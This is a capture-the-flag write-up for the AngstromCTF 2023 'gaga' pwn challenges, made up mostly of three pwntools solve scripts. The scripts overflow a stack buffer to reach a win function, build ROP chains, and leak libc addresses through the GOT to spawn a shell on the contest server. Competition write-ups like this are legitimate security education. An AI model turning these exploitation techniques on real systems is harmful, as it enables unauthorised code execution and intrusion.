gaga
05/04/2023
By: unvariant
Tags: pwn AngstromCTF-2023Problem Description:
Multipart challenge! Note all use essentially the same Dockerfile. The flags are split among all three challenges. If you are already a pwn expert, the last challenge has the entire flag.
Hints:
Reveal Hints
Nonegaga0 Solve script
from pwn import *
io = remote("challs.actf.co", 31300)
win = 0x401236
io.send(b"A" * 0x48)
io.send(p64(win))
io.interactive()
gaga1 Solve script
from pwn import *
io = remote("challs.actf.co", 31301)
win = 0x401236
io.send(b"A" * 0x48)
attack = p64(0x4013b3)
attack += p64(0x1337)
attack += p64(win)
io.send(attack)
io.interactive()
gaga2 Solve script
from pwn import *
file = ELF("gaga2")
if args.REMOTE:
io = remote("challs.actf.co", 31302)
else:
io = process("./gaga2")
win = 0x401236
rdi = 0x4012b3
ret = 0x40101a
def dump ():
for key, value in file.got.items():
io.recvuntil(b": ")
io.send(b"A" * 0x48)
attack = b""
attack += p64(rdi)
attack += p64(value)
attack += p64(file.plt["puts"])
attack += p64(file.symbols["main"])
print(attack)
io.sendline(attack)
leak = io.recv(6)
leak = u64(leak.ljust(8, b"\x00"))
print(f"{key}: {leak:x}")
io.recvuntil(b": ")
io.send(b"A" * 0x48)
attack = b""
attack += p64(rdi)
attack += p64(file.got["gets"])
attack += p64(file.plt["puts"])
attack += p64(file.symbols["main"])
print(attack)
io.sendline(attack)
leak = io.recv(6)
leak = u64(leak.ljust(8, b"\x00"))
base = leak - 0x83970
print(f"base: {base:x}")
io.recvuntil(b": ")
io.send(b"A" * 0x48)
attack = b""
attack += p64(rdi)
attack += p64(base + 0x1b45bd)
attack += p64(ret)
attack += p64(base + 0x52290)
io.send(attack)
io.interactive()